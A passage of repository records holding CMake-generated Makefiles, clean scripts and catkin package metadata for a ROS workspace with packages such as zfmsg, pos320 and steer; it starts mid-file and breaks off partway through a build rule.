target.\n_zfmsg_generate_messages_check_deps_CanInfo/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfo/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_CanInfoAW: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfoAW\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_CanInfoAW/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfoAW/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f 
CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_py: zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/rule\n\n.PHONY : zfmsg_generate_messages_py\n\n# fast build rule for target.\nzfmsg_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/build\n.PHONY : zfmsg_generate_messages_py/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_ThrottleGearStatus: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_ThrottleGearStatus\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_ThrottleGearStatus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_ThrottleGearStatus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_geneus.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_geneus.dir/rule\n\n# Convenience name for target.\nzfmsg_geneus: zfmsg/CMakeFiles/zfmsg_geneus.dir/rule\n\n.PHONY : zfmsg_geneus\n\n# fast build rule for target.\nzfmsg_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_geneus.dir/build.make zfmsg/CMakeFiles/zfmsg_geneus.dir/build\n.PHONY : zfmsg_geneus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_genlisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_genlisp.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_genlisp.dir/rule\n\n# Convenience name for target.\nzfmsg_genlisp: zfmsg/CMakeFiles/zfmsg_genlisp.dir/rule\n\n.PHONY : zfmsg_genlisp\n\n# fast build rule for target.\nzfmsg_genlisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_genlisp.dir/build.make zfmsg/CMakeFiles/zfmsg_genlisp.dir/build\n.PHONY : zfmsg_genlisp/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_lisp: zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/rule\n\n.PHONY : zfmsg_generate_messages_lisp\n\n# fast build rule for target.\nzfmsg_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/build\n.PHONY : zfmsg_generate_messages_lisp/fast\n\n# Convenience name 
for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_nodejs: zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/rule\n\n.PHONY : zfmsg_generate_messages_nodejs\n\n# fast build rule for target.\nzfmsg_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/build\n.PHONY : zfmsg_generate_messages_nodejs/fast\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... list_install_components\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... zfmsg_gennodejs\"\n\t@echo \"... zfmsg_genpy\"\n\t@echo \"... zfmsg_generate_messages_cpp\"\n\t@echo \"... install/local\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_MotionCmd\"\n\t@echo \"... install/strip\"\n\t@echo \"... zfmsg_generate_messages\"\n\t@echo \"... install\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_BreakStatus\"\n\t@echo \"... zfmsg_generate_messages_eus\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_SteerStatus\"\n\t@echo \"... zfmsg_gencpp\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_CanInfo\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_CanInfoAW\"\n\t@echo \"... zfmsg_generate_messages_py\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_ThrottleGearStatus\"\n\t@echo \"... zfmsg_geneus\"\n\t@echo \"... edit_cache\"\n\t@echo \"... zfmsg_genlisp\"\n\t@echo \"... zfmsg_generate_messages_lisp\"\n\t@echo \"... zfmsg_generate_messages_nodejs\"\n\t@echo \"... test\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7572254538536072,
"alphanum_fraction": 0.7572254538536072,
"avg_line_length": 42.25,
"blob_id": "2d4e599f47e2427fc5354d4c01e876d1b1c88c5d",
"content_id": "a01a9b87e8d9590538ea6def4232df3b36f21906",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 4,
"path": "/build/zfmsg/catkin_generated/installspace/zfmsg-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${zfmsg_DIR}/..\" \"msg\" zfmsg_MSG_INCLUDE_DIRS UNIQUE)\nset(zfmsg_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7573333382606506,
"alphanum_fraction": 0.7786666750907898,
"avg_line_length": 36.5,
"blob_id": "5be91536b5684464b4ba49c3abe5e38fa46e0315",
"content_id": "c62cf4f7161b821f7cfcd354d893eb0c34028a2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 375,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 10,
"path": "/build/path/CMakeFiles/gps_planner.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/gps_planner.dir/src/gps_planner.cpp.o\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/path/gps_planner.pdb\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/path/gps_planner\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/gps_planner.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7544757127761841,
"alphanum_fraction": 0.7851662635803223,
"avg_line_length": 38.099998474121094,
"blob_id": "98fe7f87101d3f53e5fcc3415de75b8740caa9e8",
"content_id": "dc55389acfd96e7a789690f42fc3db763d043dd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 10,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_cpp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zf_msgs/pos320.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zf_msgs/pose2dArray.h\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_cpp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7223065495491028,
"alphanum_fraction": 0.7283763289451599,
"avg_line_length": 40.25,
"blob_id": "f23b36dbbe584a3502df7b14775a2115b3bf8fa3",
"content_id": "c731511e278ca81bbf4ccb99317e33bbcdd7f42e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 659,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/build/steer/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"steer\")\nset(steer_VERSION \"0.1.0\")\nset(steer_MAINTAINER \"Your Name <[email protected]>\")\nset(steer_PACKAGE_FORMAT \"2\")\nset(steer_BUILD_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(steer_BUILD_EXPORT_DEPENDS )\nset(steer_BUILDTOOL_DEPENDS \"catkin\")\nset(steer_BUILDTOOL_EXPORT_DEPENDS )\nset(steer_EXEC_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(steer_RUN_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(steer_TEST_DEPENDS )\nset(steer_DOC_DEPENDS )\nset(steer_URL_WEBSITE \"http://wiki.ros.org/steer\")\nset(steer_URL_BUGTRACKER \"\")\nset(steer_URL_REPOSITORY \"\")\nset(steer_DEPRECATED \"\")"
},
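The package.cmake above records steer's catkin metadata: build and exec dependencies on roscpp, rospy, std_msgs, geometry_msgs, and zf_msgs. A minimal CMakeLists.txt stanza consistent with that metadata, offered as an assumed reconstruction rather than the repo's actual file:

    # Sketch consistent with the steer package metadata (assumed, not from the repo):
    cmake_minimum_required(VERSION 2.8.3)
    project(steer)
    find_package(catkin REQUIRED COMPONENTS roscpp rospy std_msgs geometry_msgs zf_msgs)
    catkin_package(CATKIN_DEPENDS roscpp rospy std_msgs geometry_msgs zf_msgs)
    include_directories(${catkin_INCLUDE_DIRS})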
{
"alpha_fraction": 0.7030789256095886,
"alphanum_fraction": 0.7531555891036987,
"avg_line_length": 35.7744026184082,
"blob_id": "20d91006ff313cccb5b3482ce4d79b667773a461",
"content_id": "4cdb7ddec85d1cda93090ce7bf0b270b70bb92c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 16954,
"license_type": "no_license",
"max_line_length": 223,
"num_lines": 461,
"path": "/build/pos320/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : 
install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles /home/zf/xuechong_ws/zhuifengShow0919/build/pos320/CMakeFiles/progress.marks\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\npos320/CMakeFiles/driver.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/driver.dir/rule\n.PHONY : pos320/CMakeFiles/driver.dir/rule\n\n# Convenience name for target.\ndriver: pos320/CMakeFiles/driver.dir/rule\n\n.PHONY : driver\n\n# fast build rule for target.\ndriver/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/driver.dir/build.make pos320/CMakeFiles/driver.dir/build\n.PHONY : driver/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_genpy.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_genpy.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_genpy.dir/rule\n\n# Convenience name for target.\npos320_genpy: pos320/CMakeFiles/pos320_genpy.dir/rule\n\n.PHONY : pos320_genpy\n\n# fast build rule for target.\npos320_genpy/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_genpy.dir/build.make pos320/CMakeFiles/pos320_genpy.dir/build\n.PHONY : pos320_genpy/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_py.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_py.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_py: pos320/CMakeFiles/pos320_generate_messages_py.dir/rule\n\n.PHONY : pos320_generate_messages_py\n\n# fast build rule for target.\npos320_generate_messages_py/fast:\n\tcd 
/home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_py.dir/build.make pos320/CMakeFiles/pos320_generate_messages_py.dir/build\n.PHONY : pos320_generate_messages_py/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages.dir/rule\n\n# Convenience name for target.\npos320_generate_messages: pos320/CMakeFiles/pos320_generate_messages.dir/rule\n\n.PHONY : pos320_generate_messages\n\n# fast build rule for target.\npos320_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages.dir/build.make pos320/CMakeFiles/pos320_generate_messages.dir/build\n.PHONY : pos320_generate_messages/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_geneus.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_geneus.dir/rule\n\n# Convenience name for target.\npos320_geneus: pos320/CMakeFiles/pos320_geneus.dir/rule\n\n.PHONY : pos320_geneus\n\n# fast build rule for target.\npos320_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_geneus.dir/build.make pos320/CMakeFiles/pos320_geneus.dir/build\n.PHONY : pos320_geneus/fast\n\n# Convenience name for target.\npos320/CMakeFiles/simulator.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/simulator.dir/rule\n.PHONY : pos320/CMakeFiles/simulator.dir/rule\n\n# Convenience name for target.\nsimulator: pos320/CMakeFiles/simulator.dir/rule\n\n.PHONY : simulator\n\n# fast build rule for target.\nsimulator/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/simulator.dir/build.make pos320/CMakeFiles/simulator.dir/build\n.PHONY : simulator/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_eus.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_eus.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_eus: pos320/CMakeFiles/pos320_generate_messages_eus.dir/rule\n\n.PHONY : pos320_generate_messages_eus\n\n# fast build rule for target.\npos320_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_eus.dir/build.make pos320/CMakeFiles/pos320_generate_messages_eus.dir/build\n.PHONY : pos320_generate_messages_eus/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_cpp.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_cpp: pos320/CMakeFiles/pos320_generate_messages_cpp.dir/rule\n\n.PHONY : pos320_generate_messages_cpp\n\n# fast build rule for target.\npos320_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_cpp.dir/build.make 
pos320/CMakeFiles/pos320_generate_messages_cpp.dir/build\n.PHONY : pos320_generate_messages_cpp/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_lisp.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_lisp: pos320/CMakeFiles/pos320_generate_messages_lisp.dir/rule\n\n.PHONY : pos320_generate_messages_lisp\n\n# fast build rule for target.\npos320_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_lisp.dir/build.make pos320/CMakeFiles/pos320_generate_messages_lisp.dir/build\n.PHONY : pos320_generate_messages_lisp/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_gencpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_gencpp.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_gencpp.dir/rule\n\n# Convenience name for target.\npos320_gencpp: pos320/CMakeFiles/pos320_gencpp.dir/rule\n\n.PHONY : pos320_gencpp\n\n# fast build rule for target.\npos320_gencpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_gencpp.dir/build.make pos320/CMakeFiles/pos320_gencpp.dir/build\n.PHONY : pos320_gencpp/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_genlisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_genlisp.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_genlisp.dir/rule\n\n# Convenience name for target.\npos320_genlisp: pos320/CMakeFiles/pos320_genlisp.dir/rule\n\n.PHONY : pos320_genlisp\n\n# fast build rule for target.\npos320_genlisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_genlisp.dir/build.make pos320/CMakeFiles/pos320_genlisp.dir/build\n.PHONY : pos320_genlisp/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\npos320_generate_messages_nodejs: pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/rule\n\n.PHONY : pos320_generate_messages_nodejs\n\n# fast build rule for target.\npos320_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/build.make pos320/CMakeFiles/pos320_generate_messages_nodejs.dir/build\n.PHONY : pos320_generate_messages_nodejs/fast\n\n# Convenience name for target.\npos320/CMakeFiles/pos320_gennodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 pos320/CMakeFiles/pos320_gennodejs.dir/rule\n.PHONY : pos320/CMakeFiles/pos320_gennodejs.dir/rule\n\n# Convenience name for target.\npos320_gennodejs: pos320/CMakeFiles/pos320_gennodejs.dir/rule\n\n.PHONY : pos320_gennodejs\n\n# fast build rule for target.\npos320_gennodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f pos320/CMakeFiles/pos320_gennodejs.dir/build.make pos320/CMakeFiles/pos320_gennodejs.dir/build\n.PHONY : pos320_gennodejs/fast\n\nsrc/driver.o: 
